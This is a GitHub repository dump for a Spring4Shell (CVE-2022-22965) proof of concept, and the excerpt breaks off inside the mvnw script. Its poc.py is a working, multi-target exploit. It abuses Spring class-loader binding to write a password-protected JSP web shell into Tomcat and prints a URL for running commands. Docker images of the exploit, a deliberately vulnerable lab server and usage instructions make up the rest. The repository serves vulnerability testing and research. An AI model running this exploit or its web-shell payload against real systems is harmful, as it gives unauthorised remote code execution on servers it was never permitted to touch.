├── .dockerignore ├── .github ├── FUNDING.yml └── workflows │ ├── app-docker-publish.yml │ └── docker-publish.yml ├── Dockerfile ├── README.md ├── poc.py ├── requirements.txt ├── spring4shell.png └── vulnerable-tomcat ├── .dockerignore ├── Dockerfile ├── README.md ├── spring-form.war ├── spring-war ├── .gitignore ├── .mvn │ └── wrapper │ │ └── maven-wrapper.properties ├── build.gradle ├── gradle │ └── wrapper │ │ └── gradle-wrapper.properties ├── gradlew ├── gradlew.bat ├── mvnw ├── mvnw.cmd ├── pom.xml ├── settings.gradle └── src │ ├── main │ ├── java │ │ └── com │ │ │ └── example │ │ │ └── handlingformsubmission │ │ │ ├── Greeting.java │ │ │ ├── GreetingController.java │ │ │ └── HandlingFormSubmissionApplication.java │ └── resources │ │ └── templates │ │ ├── greeting.html │ │ └── result.html │ └── test │ └── java │ └── com │ └── example │ └── handlingformsubmission │ └── HandlingFormSubmissionApplicationTest.java └── spring4shellapplication.png /.dockerignore: -------------------------------------------------------------------------------- 1 | vulnerable-tomcat/ 2 | spring4shell.png 3 | README.md 4 | .git/ 5 | .github/ -------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: BobTheShoplifter 4 | patreon: # Replace with a single Patreon username 5 | open_collective: # Replace with a single Open Collective username 6 | ko_fi: # Replace with a single Ko-fi username 7 | tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel 8 | community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry 9 | liberapay: # Replace with a single Liberapay username 10 | issuehunt: # Replace with a single IssueHunt username 11 | otechie: # Replace with a single Otechie username 12 | lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry 13 | custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2'] 14 | -------------------------------------------------------------------------------- /.github/workflows/app-docker-publish.yml: -------------------------------------------------------------------------------- 1 | name: Docker-vulnerable-App 2 | 3 | # This workflow uses actions that are not certified by GitHub. 4 | # They are provided by a third-party and are governed by 5 | # separate terms of service, privacy policy, and support 6 | # documentation. 7 | 8 | on: 9 | schedule: 10 | - cron: '16 18 * * *' 11 | push: 12 | branches: [main] 13 | paths: 14 | - 'vulnerable-tomcat/**' 15 | - '!vulnerable-tomcat/README.md' 16 | # Publish semver tags as releases. 17 | tags: ['v*.*.*'] 18 | pull_request: 19 | branches: [main] 20 | 21 | env: 22 | # Use docker.io for Docker Hub if empty 23 | REGISTRY: ghcr.io 24 | # github.repository as / 25 | IMAGE_NAME: ${{ github.REPOSITORY_OWNER }}/spring4shell-vulnerable-tomcat 26 | 27 | jobs: 28 | build: 29 | runs-on: ubuntu-latest 30 | permissions: 31 | contents: read 32 | packages: write 33 | # This is used to complete the identity challenge 34 | # with sigstore/fulcio when running outside of PRs. 35 | id-token: write 36 | 37 | steps: 38 | - name: Checkout repository 39 | uses: actions/checkout@v3 40 | 41 | # Workaround: https://github.com/docker/build-push-action/issues/461 42 | - name: Setup Docker buildx 43 | uses: docker/setup-buildx-action@79abd3f86f79a9d68a23c75a09a9a85889262adf 44 | 45 | # Login against a Docker registry except on PR 46 | # https://github.com/docker/login-action 47 | - name: Log into registry ${{ env.REGISTRY }} 48 | if: github.event_name != 'pull_request' 49 | uses: docker/login-action@28218f9b04b4f3f62068d7b6ce6ca5b26e35336c 50 | with: 51 | registry: ${{ env.REGISTRY }} 52 | username: ${{ github.actor }} 53 | password: ${{ secrets.GITHUB_TOKEN }} 54 | 55 | # Extract metadata (tags, labels) for Docker 56 | # https://github.com/docker/metadata-action 57 | - name: Extract Docker metadata 58 | id: meta 59 | uses: docker/metadata-action@98669ae865ea3cffbcbaa878cf57c20bbf1c6c38 60 | with: 61 | images: ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }} 62 | 63 | # Build and push Docker image with Buildx (don't push on PR) 64 | # https://github.com/docker/build-push-action 65 | - name: Build and push Docker image 66 | id: build-and-push 67 | uses: docker/build-push-action@ad44023a93711e3deb337508980b4b5e9bcdc5dc 68 | with: 69 | context: vulnerable-tomcat/. 70 | push: ${{ github.event_name != 'pull_request' }} 71 | tags: ${{ steps.meta.outputs.tags }} 72 | labels: ${{ steps.meta.outputs.labels }} 73 | -------------------------------------------------------------------------------- /.github/workflows/docker-publish.yml: -------------------------------------------------------------------------------- 1 | name: Docker 2 | 3 | # This workflow uses actions that are not certified by GitHub. 4 | # They are provided by a third-party and are governed by 5 | # separate terms of service, privacy policy, and support 6 | # documentation. 7 | 8 | on: 9 | push: 10 | branches: [main] 11 | paths-ignore: 12 | - 'vulnerable-tomcat/**' 13 | - 'README.md' 14 | # Publish semver tags as releases. 15 | tags: ['v*.*.*'] 16 | pull_request: 17 | branches: [main] 18 | 19 | env: 20 | # Use docker.io for Docker Hub if empty 21 | REGISTRY: ghcr.io 22 | # github.repository as / 23 | IMAGE_NAME: ${{ github.repository }} 24 | 25 | jobs: 26 | build: 27 | runs-on: ubuntu-latest 28 | permissions: 29 | contents: read 30 | packages: write 31 | # This is used to complete the identity challenge 32 | # with sigstore/fulcio when running outside of PRs. 33 | id-token: write 34 | 35 | steps: 36 | - name: Checkout repository 37 | uses: actions/checkout@v3 38 | 39 | # Workaround: https://github.com/docker/build-push-action/issues/461 40 | - name: Setup Docker buildx 41 | uses: docker/setup-buildx-action@79abd3f86f79a9d68a23c75a09a9a85889262adf 42 | 43 | # Login against a Docker registry except on PR 44 | # https://github.com/docker/login-action 45 | - name: Log into registry ${{ env.REGISTRY }} 46 | if: github.event_name != 'pull_request' 47 | uses: docker/login-action@28218f9b04b4f3f62068d7b6ce6ca5b26e35336c 48 | with: 49 | registry: ${{ env.REGISTRY }} 50 | username: ${{ github.actor }} 51 | password: ${{ secrets.GITHUB_TOKEN }} 52 | 53 | # Extract metadata (tags, labels) for Docker 54 | # https://github.com/docker/metadata-action 55 | - name: Extract Docker metadata 56 | id: meta 57 | uses: docker/metadata-action@98669ae865ea3cffbcbaa878cf57c20bbf1c6c38 58 | with: 59 | images: ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }} 60 | 61 | # Build and push Docker image with Buildx (don't push on PR) 62 | # https://github.com/docker/build-push-action 63 | - name: Build and push Docker image 64 | id: build-and-push 65 | uses: docker/build-push-action@ad44023a93711e3deb337508980b4b5e9bcdc5dc 66 | with: 67 | context: . 68 | push: ${{ github.event_name != 'pull_request' }} 69 | tags: ${{ steps.meta.outputs.tags }} 70 | labels: ${{ steps.meta.outputs.labels }} 71 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8-alpine 2 | RUN mkdir /app 3 | ADD . /app 4 | WORKDIR /app 5 | RUN pip install -r requirements.txt 6 | ENTRYPOINT ["python", "poc.py"] 7 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Spring4Shell-POC (CVE-2022-22965) 2 | 3 | ![Spring4Shell](spring4shell.png) 4 | 5 | ![Docker Build](https://github.com/BobTheShoplifter/Spring4Shell-POC/actions/workflows/docker-publish.yml/badge.svg) ![Docker App Build](https://github.com/BobTheShoplifter/Spring4Shell-POC/actions/workflows/app-docker-publish.yml/badge.svg) ![Stars](https://img.shields.io/github/stars/BobTheShoplifter/Spring4Shell-POC?style=social) ![Docker Run](https://img.shields.io/github/followers/BobTheShoplifter?label=Follow&style=social) 6 | 7 | Spring4Shell (CVE-2022-22965) Proof Of Concept/Information + [A vulnerable Tomcat server with a vulnerable spring4shell application.](vulnerable-tomcat/) 8 | 9 | Early this morning, multiple sources has informed of a possible RCE exploit in the popular java framework spring. 10 | 11 | The naming of this flaw is based on the similarities to the infamous Log4j LOG4Shell. 12 | 13 | ## Details about this vulnerability 14 | 15 | - [https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc](https://websecured.io/blog/624411cf775ad17d72274d16/spring4shell-poc) 16 | - [https://www.springcloud.io/post/2022-03/spring-0day-vulnerability](https://www.springcloud.io/post/2022-03/spring-0day-vulnerability) 17 | - [https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement) 18 | 19 | ## POC Usage 20 | 21 | The usage is simple! You can either run the docker image, or just run the python script! 22 | 23 | Please see vulnerable-tomcat for inscructions on setting up your own spring4shell vulnerable application [here!](vulnerable-tomcat/) 24 | 25 | ### Requirements 26 | 27 | - Python3 or [Docker](https://hub.docker.com/r/bobtheshoplifter/spring4shell-poc) 28 | 29 | ### Python 30 | 31 | ```python 32 | pip install -r requirements.txt 33 | poc.py --help 34 | ``` 35 | 36 | ![image](https://user-images.githubusercontent.com/22559547/161398549-05d279b2-51d6-49fb-9245-018747606321.png) 37 | 38 | ### Docker 39 | 40 | ```sh 41 | ## Dockerhub 42 | docker pull bobtheshoplifter/spring4shell-poc:latest 43 | docker run bobtheshoplifter/spring4shell-poc:latest --url https://example.io/ 44 | ## Github docker repository 45 | docker pull ghcr.io/bobtheshoplifter/spring4shell-poc:main 46 | docker run ghcr.io/bobtheshoplifter/spring4shell-poc:main --url https://example.io/ 47 | ``` 48 | 49 | ![image](https://user-images.githubusercontent.com/22559547/161400099-fb6c4f02-9d48-457a-8c91-041a9a8438b7.png) 50 | 51 | ## Vulnerable Tomcat server 52 | 53 | I have now made a docker image for this, which includes a vulnerable spring + tomcat application. 54 | 55 | The application should be enough to test this vulnerability. 56 | 57 | [Please see (vulnerable-tomcat/README.md)](vulnerable-tomcat/README.md) 58 | 59 | ## Mitigations 60 | 61 | !!(The following mitigations are only theoretical as nothing has been confirmed)!! 62 | 63 | ### JDK Version under 9 64 | 65 | Cyberkendra informed that JDK versions lower than JDK 9 66 | 67 | You can easily check this by running 68 | 69 | ```sh 70 | java -version 71 | ``` 72 | 73 | That will display something similar to this 74 | 75 | ```sh 76 | openjdk version "17.0.2" 2022-01-18 77 | OpenJDK Runtime Environment (build 17.0.2+8-Ubuntu-120.04) 78 | OpenJDK 64-Bit Server VM (build 17.0.2+8-Ubuntu-120.04, mixed mode, sharing) 79 | ``` 80 | 81 | If your JDK version is under 8, you might be safe, but nothing is confirmed yet 82 | 83 | The following article will be updated 84 | 85 | ### Check if you are using the spring framework 86 | 87 | Do a global search after `spring-beans*.jar` and `spring*.jar` 88 | 89 | ```sh 90 | find . -name spring-beans*.jar 91 | ``` 92 | 93 | [^1]: POC, translated fron this repository. 94 | 95 | POC, translated fron this repository: https://github.com/craig/SpringCore0day/blob/main/exp.py 96 | -------------------------------------------------------------------------------- /poc.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python3 2 | #coding:utf-8 3 | 4 | import requests 5 | import argparse 6 | import urllib3 7 | 8 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 9 | 10 | from urllib.parse import urljoin,urlparse 11 | from threading import Thread 12 | from sys import exit 13 | import time 14 | 15 | 16 | class Exploit(Thread): 17 | 18 | def __init__(self, url): 19 | super(self.__class__, self).__init__() 20 | 21 | self.url = url 22 | 23 | def run(self): 24 | headers = { 25 | "suffix": "%>//", 26 | "c1": "Runtime", 27 | "c2": "<%", 28 | "DNT": "1", 29 | "Content-Type": "application/x-www-form-urlencoded", 30 | } 31 | 32 | data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" 33 | 34 | try: 35 | requests.post(self.url, 36 | headers=headers, 37 | data=data, 38 | timeout=15, 39 | allow_redirects=False, 40 | verify=False) 41 | time.sleep(10) ## Wait for the upload to complete 42 | shellurl = urljoin(self.url, 'tomcatwar.jsp') 43 | shellgo = requests.get(shellurl, 44 | timeout=15, 45 | allow_redirects=False, 46 | stream=True, 47 | verify=False) 48 | if shellgo.status_code == 200: 49 | print(f"Vulnerable,shell url: {shellurl}?pwd=j&cmd=whoami") 50 | 51 | ## Depending on the server, the shell url may be in tomcats root folder 52 | else: 53 | parsedurl = urlparse(shellurl) 54 | rooturl = parsedurl.scheme+"://"+parsedurl.netloc # There is 100% a better way to do this, please make a PR if you know! 55 | shellurlroot = urljoin(rooturl, 'tomcatwar.jsp') 56 | shellgoroot = requests.get(shellurlroot, 57 | timeout=15, 58 | allow_redirects=False, 59 | stream=True, 60 | verify=False) 61 | if shellgoroot.status_code == 200: 62 | print(f"Vulnerable,shell url: {shellurlroot}?pwd=j&cmd=whoami") 63 | else: 64 | print(f"\033[91m[" + '\u2718' + "]\033[0m", self.url, 65 | "\033[91mNot Vulnerable! :(\033[0m ") 66 | 67 | except Exception as e: 68 | print(e) 69 | pass 70 | 71 | 72 | if __name__ == '__main__': 73 | parser = argparse.ArgumentParser(description='Spring-Core Rce.') 74 | parser.add_argument('--file', help='url file', required=False) 75 | parser.add_argument('--url', help='target url', required=False) 76 | args = parser.parse_args() 77 | 78 | if args.url: 79 | Exploit(args.url).start() 80 | exit() 81 | 82 | if args.file: 83 | with open(args.file) as f: 84 | urls = [i.strip() for i in f.readlines()] 85 | [Exploit(url).start() for url in urls] 86 | 87 | else: 88 | parser.print_help() 89 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | argparse 3 | urllib3 4 | -------------------------------------------------------------------------------- /spring4shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BobTheShoplifter/Spring4Shell-POC/f856cf519af5c75c7cac670dcc1769f282803047/spring4shell.png -------------------------------------------------------------------------------- /vulnerable-tomcat/.dockerignore: -------------------------------------------------------------------------------- 1 | spring-war/ -------------------------------------------------------------------------------- /vulnerable-tomcat/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tomcat:9.0.60-jre11-openjdk-slim-buster 2 | 3 | ADD spring-form.war /usr/local/tomcat/webapps/ 4 | 5 | EXPOSE 8888 6 | 7 | CMD ["catalina.sh", "run"] -------------------------------------------------------------------------------- /vulnerable-tomcat/README.md: -------------------------------------------------------------------------------- 1 | # Example of a spring4shell vulnerable Tomcat application 2 | 3 | ![spring4shellapplication](spring4shellapplication.png) 4 | 5 | ## Example (Docker) 6 | 7 | Prebuilt image availible at [Docker Hub](https://hub.docker.com/r/bobtheshoplifter/spring4shell-vulnerable-tomcat) 8 | 9 | An example of a vulnerable Tomcat application + server. 10 | 11 | War files built from /spring-war folder. (It is recommended to build your own war files but i have provided one based on ) 12 | 13 | ### Build 14 | 15 | Building the docker version of the vunurable application, you can build your own war files. 16 | 17 | ### Building your own war file 18 | 19 | You can use the provided spring-form.war or build your own 20 | 21 | #### Prerequisites (Only if building your own war files) 22 | 23 | - Java 24 | - Java JDK (I have only tested with JDK 18) 25 | - [Maven](https://maven.apache.org/install.html) 26 | 27 | ```sh 28 | cd spring-war 29 | mvn clean package 30 | cd target 31 | mv spring-form.war ../../ # Linux move the war file to vunerable-tomcat 32 | move spring-form.war ../../ # Windows 33 | cd ../../ 34 | ``` 35 | 36 | ### Building and starting the docker container 37 | 38 | ```sh 39 | docker build -t vulnerable-tomcat . 40 | docker run -it --rm -p 8888:8080 vulnerable-tomcat 41 | ``` 42 | 43 | Wait about 20 seconds for the server to start. Then run the exploit script. 44 | 45 | ```sh 46 | python3 poc.py --url http://:8888/spring-form/greeting 47 | #or docker variant 48 | docker pull ghcr.io/bobtheshoplifter/spring4shell-poc:main 49 | docker run ghcr.io/bobtheshoplifter/spring4shell-poc:main --url http://:8888/spring-form/greeting 50 | ``` 51 | 52 | If all goes well you should see something simular to this! 53 | 54 | ![image](https://user-images.githubusercontent.com/22559547/161576282-a11873df-9b34-454b-9a92-2e15bb9d2a43.png) 55 | 56 | 57 | ## Example (Manual/Old) 58 | 59 | Found intresting poc here : [^1]. & 60 | 61 | - Docker, POC 62 | 63 | - clone sample repo from 64 | - you can skip right to the gs-handling-form-submission/complete directory, no need to follow the tutorial 65 | - modify it so that you can build a war file (). build war file :) 66 | - install tomcat9 + java 11 (i did it on ubuntu 20.04 via apt-get) 67 | - deploy the war file 68 | - update the PoC () to write the tomcatwar.jsp file to webapps/handling-form-submission instead of webapps/ROOT 69 | - run PoC (ignore the URL it gives you for the webshell): python3 exp.py --url 70 | - you should see the "tomcatwar.jsp" file now in webapps/handling-form-submission 71 | - hit to see the results 72 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-form.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BobTheShoplifter/Spring4Shell-POC/f856cf519af5c75c7cac670dcc1769f282803047/vulnerable-tomcat/spring-form.war -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/.gitignore: -------------------------------------------------------------------------------- 1 | target/ 2 | pom.xml.tag 3 | pom.xml.releaseBackup 4 | pom.xml.versionsBackup 5 | pom.xml.next 6 | release.properties 7 | dependency-reduced-pom.xml 8 | buildNumber.properties 9 | .mvn/timing.properties 10 | # https://github.com/takari/maven-wrapper#usage-without-binary-jar 11 | .mvn/wrapper/maven-wrapper.jar 12 | gradle/wrapper/gradle-wrapper.jar -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/.mvn/wrapper/maven-wrapper.properties: -------------------------------------------------------------------------------- 1 | distributionUrl=https://repo.maven.apache.org/maven2/org/apache/maven/apache-maven/3.6.3/apache-maven-3.6.3-bin.zip 2 | wrapperUrl=https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.5.2/maven-wrapper-0.5.2.tar.gz 3 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/build.gradle: -------------------------------------------------------------------------------- 1 | plugins { 2 | id 'org.springframework.boot' version '2.6.3' 3 | id 'io.spring.dependency-management' version '1.0.11.RELEASE' 4 | id 'java' 5 | } 6 | 7 | group = 'com.example' 8 | version = '0.0.1-SNAPSHOT' 9 | sourceCompatibility = '1.8' 10 | 11 | repositories { 12 | mavenCentral() 13 | } 14 | 15 | dependencies { 16 | implementation 'org.springframework.boot:spring-boot-starter-thymeleaf' 17 | implementation 'org.springframework.boot:spring-boot-starter-web' 18 | testImplementation 'org.springframework.boot:spring-boot-starter-test' 19 | } 20 | 21 | test { 22 | useJUnitPlatform() 23 | } 24 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/gradle/wrapper/gradle-wrapper.properties: -------------------------------------------------------------------------------- 1 | distributionBase=GRADLE_USER_HOME 2 | distributionPath=wrapper/dists 3 | distributionUrl=https\://services.gradle.org/distributions/gradle-7.1-bin.zip 4 | zipStoreBase=GRADLE_USER_HOME 5 | zipStorePath=wrapper/dists 6 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/gradlew: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env sh 2 | 3 | # 4 | # Copyright 2015 the original author or authors. 5 | # 6 | # Licensed under the Apache License, Version 2.0 (the "License"); 7 | # you may not use this file except in compliance with the License. 8 | # You may obtain a copy of the License at 9 | # 10 | # https://www.apache.org/licenses/LICENSE-2.0 11 | # 12 | # Unless required by applicable law or agreed to in writing, software 13 | # distributed under the License is distributed on an "AS IS" BASIS, 14 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 15 | # See the License for the specific language governing permissions and 16 | # limitations under the License. 17 | # 18 | 19 | ############################################################################## 20 | ## 21 | ## Gradle start up script for UN*X 22 | ## 23 | ############################################################################## 24 | 25 | # Attempt to set APP_HOME 26 | # Resolve links: $0 may be a link 27 | PRG="$0" 28 | # Need this for relative symlinks. 29 | while [ -h "$PRG" ] ; do 30 | ls=`ls -ld "$PRG"` 31 | link=`expr "$ls" : '.*-> \(.*\)$'` 32 | if expr "$link" : '/.*' > /dev/null; then 33 | PRG="$link" 34 | else 35 | PRG=`dirname "$PRG"`"/$link" 36 | fi 37 | done 38 | SAVED="`pwd`" 39 | cd "`dirname \"$PRG\"`/" >/dev/null 40 | APP_HOME="`pwd -P`" 41 | cd "$SAVED" >/dev/null 42 | 43 | APP_NAME="Gradle" 44 | APP_BASE_NAME=`basename "$0"` 45 | 46 | # Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. 47 | DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' 48 | 49 | # Use the maximum available, or set MAX_FD != -1 to use that value. 50 | MAX_FD="maximum" 51 | 52 | warn () { 53 | echo "$*" 54 | } 55 | 56 | die () { 57 | echo 58 | echo "$*" 59 | echo 60 | exit 1 61 | } 62 | 63 | # OS specific support (must be 'true' or 'false'). 64 | cygwin=false 65 | msys=false 66 | darwin=false 67 | nonstop=false 68 | case "`uname`" in 69 | CYGWIN* ) 70 | cygwin=true 71 | ;; 72 | Darwin* ) 73 | darwin=true 74 | ;; 75 | MSYS* | MINGW* ) 76 | msys=true 77 | ;; 78 | NONSTOP* ) 79 | nonstop=true 80 | ;; 81 | esac 82 | 83 | CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 84 | 85 | 86 | # Determine the Java command to use to start the JVM. 87 | if [ -n "$JAVA_HOME" ] ; then 88 | if [ -x "$JAVA_HOME/jre/sh/java" ] ; then 89 | # IBM's JDK on AIX uses strange locations for the executables 90 | JAVACMD="$JAVA_HOME/jre/sh/java" 91 | else 92 | JAVACMD="$JAVA_HOME/bin/java" 93 | fi 94 | if [ ! -x "$JAVACMD" ] ; then 95 | die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 96 | 97 | Please set the JAVA_HOME variable in your environment to match the 98 | location of your Java installation." 99 | fi 100 | else 101 | JAVACMD="java" 102 | which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 103 | 104 | Please set the JAVA_HOME variable in your environment to match the 105 | location of your Java installation." 106 | fi 107 | 108 | # Increase the maximum file descriptors if we can. 109 | if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then 110 | MAX_FD_LIMIT=`ulimit -H -n` 111 | if [ $? -eq 0 ] ; then 112 | if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then 113 | MAX_FD="$MAX_FD_LIMIT" 114 | fi 115 | ulimit -n $MAX_FD 116 | if [ $? -ne 0 ] ; then 117 | warn "Could not set maximum file descriptor limit: $MAX_FD" 118 | fi 119 | else 120 | warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" 121 | fi 122 | fi 123 | 124 | # For Darwin, add options to specify how the application appears in the dock 125 | if $darwin; then 126 | GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" 127 | fi 128 | 129 | # For Cygwin or MSYS, switch paths to Windows format before running java 130 | if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then 131 | APP_HOME=`cygpath --path --mixed "$APP_HOME"` 132 | CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` 133 | 134 | JAVACMD=`cygpath --unix "$JAVACMD"` 135 | 136 | # We build the pattern for arguments to be converted via cygpath 137 | ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` 138 | SEP="" 139 | for dir in $ROOTDIRSRAW ; do 140 | ROOTDIRS="$ROOTDIRS$SEP$dir" 141 | SEP="|" 142 | done 143 | OURCYGPATTERN="(^($ROOTDIRS))" 144 | # Add a user-defined pattern to the cygpath arguments 145 | if [ "$GRADLE_CYGPATTERN" != "" ] ; then 146 | OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" 147 | fi 148 | # Now convert the arguments - kludge to limit ourselves to /bin/sh 149 | i=0 150 | for arg in "$@" ; do 151 | CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` 152 | CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option 153 | 154 | if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition 155 | eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` 156 | else 157 | eval `echo args$i`="\"$arg\"" 158 | fi 159 | i=`expr $i + 1` 160 | done 161 | case $i in 162 | 0) set -- ;; 163 | 1) set -- "$args0" ;; 164 | 2) set -- "$args0" "$args1" ;; 165 | 3) set -- "$args0" "$args1" "$args2" ;; 166 | 4) set -- "$args0" "$args1" "$args2" "$args3" ;; 167 | 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; 168 | 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; 169 | 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; 170 | 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; 171 | 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; 172 | esac 173 | fi 174 | 175 | # Escape application args 176 | save () { 177 | for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done 178 | echo " " 179 | } 180 | APP_ARGS=`save "$@"` 181 | 182 | # Collect all arguments for the java command, following the shell quoting and substitution rules 183 | eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" 184 | 185 | exec "$JAVACMD" "$@" 186 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/gradlew.bat: -------------------------------------------------------------------------------- 1 | @rem 2 | @rem Copyright 2015 the original author or authors. 3 | @rem 4 | @rem Licensed under the Apache License, Version 2.0 (the "License"); 5 | @rem you may not use this file except in compliance with the License. 6 | @rem You may obtain a copy of the License at 7 | @rem 8 | @rem https://www.apache.org/licenses/LICENSE-2.0 9 | @rem 10 | @rem Unless required by applicable law or agreed to in writing, software 11 | @rem distributed under the License is distributed on an "AS IS" BASIS, 12 | @rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | @rem See the License for the specific language governing permissions and 14 | @rem limitations under the License. 15 | @rem 16 | 17 | @if "%DEBUG%" == "" @echo off 18 | @rem ########################################################################## 19 | @rem 20 | @rem Gradle startup script for Windows 21 | @rem 22 | @rem ########################################################################## 23 | 24 | @rem Set local scope for the variables with windows NT shell 25 | if "%OS%"=="Windows_NT" setlocal 26 | 27 | set DIRNAME=%~dp0 28 | if "%DIRNAME%" == "" set DIRNAME=. 29 | set APP_BASE_NAME=%~n0 30 | set APP_HOME=%DIRNAME% 31 | 32 | @rem Resolve any "." and ".." in APP_HOME to make it shorter. 33 | for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi 34 | 35 | @rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. 36 | set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" 37 | 38 | @rem Find java.exe 39 | if defined JAVA_HOME goto findJavaFromJavaHome 40 | 41 | set JAVA_EXE=java.exe 42 | %JAVA_EXE% -version >NUL 2>&1 43 | if "%ERRORLEVEL%" == "0" goto execute 44 | 45 | echo. 46 | echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 47 | echo. 48 | echo Please set the JAVA_HOME variable in your environment to match the 49 | echo location of your Java installation. 50 | 51 | goto fail 52 | 53 | :findJavaFromJavaHome 54 | set JAVA_HOME=%JAVA_HOME:"=% 55 | set JAVA_EXE=%JAVA_HOME%/bin/java.exe 56 | 57 | if exist "%JAVA_EXE%" goto execute 58 | 59 | echo. 60 | echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 61 | echo. 62 | echo Please set the JAVA_HOME variable in your environment to match the 63 | echo location of your Java installation. 64 | 65 | goto fail 66 | 67 | :execute 68 | @rem Setup the command line 69 | 70 | set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar 71 | 72 | 73 | @rem Execute Gradle 74 | "%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* 75 | 76 | :end 77 | @rem End local scope for the variables with windows NT shell 78 | if "%ERRORLEVEL%"=="0" goto mainEnd 79 | 80 | :fail 81 | rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of 82 | rem the _cmd.exe /c_ return code! 83 | if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 84 | exit /b 1 85 | 86 | :mainEnd 87 | if "%OS%"=="Windows_NT" endlocal 88 | 89 | :omega 90 | -------------------------------------------------------------------------------- /vulnerable-tomcat/spring-war/mvnw: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # ---------------------------------------------------------------------------- 3 | # Licensed to the Apache Software Foundation (ASF) under one 4 | # or more contributor license agreements. See the NOTICE file 5 | # distributed with this work for additional information 6 | # regarding copyright ownership. The ASF licenses this file 7 | # to you under the Apache License, Version 2.0 (the 8 | # "License"); you may not use this file except in compliance 9 | # with the License. You may obtain a copy of the License at 10 | # 11 | # http://www.apache.org/licenses/LICENSE-2.0 12 | # 13 | # Unless required by applicable law or agreed to in writing, 14 | # software distributed under the License is distributed on an 15 